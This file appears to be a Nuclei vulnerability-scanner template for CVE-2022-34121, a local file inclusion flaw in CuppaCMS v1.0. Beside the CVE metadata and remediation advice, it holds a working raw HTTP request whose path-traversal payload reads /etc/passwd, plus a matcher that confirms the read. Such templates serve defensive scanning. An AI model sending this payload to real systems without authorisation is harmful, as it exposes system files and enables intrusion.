nuclei-templates/http/cves/2022/CVE-2022-34121.yaml

52 lines
1.8 KiB
YAML

id: CVE-2022-34121
info:
name: CuppaCMS v1.0 - Local File Inclusion
author: edoardottt
severity: high
description: |
Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
remediation: |
Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability.
reference:
- https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates
- https://github.com/CuppaCMS/CuppaCMS/issues/18
- https://nvd.nist.gov/vuln/detail/CVE-2022-34121
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34121
cwe-id: CWE-829
epss-score: 0.69358
epss-percentile: 0.97998
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: cuppacms
product: cuppacms
tags: cve,cve2022,lfi,cuppa,cms,cuppacms
http:
- raw:
- |
POST /templates/default/html/windows/right.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=../../../../../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4b0a00483046022100b349fbc017fdba9616a667d7a762c1f50f724c5f91c70a65aa366774b1b44c17022100991acb8def276e72b096d3d82bf30714f276c63f597a3bc6c7a8d081234e4413:922c64590222798bb761d5b6d8e72950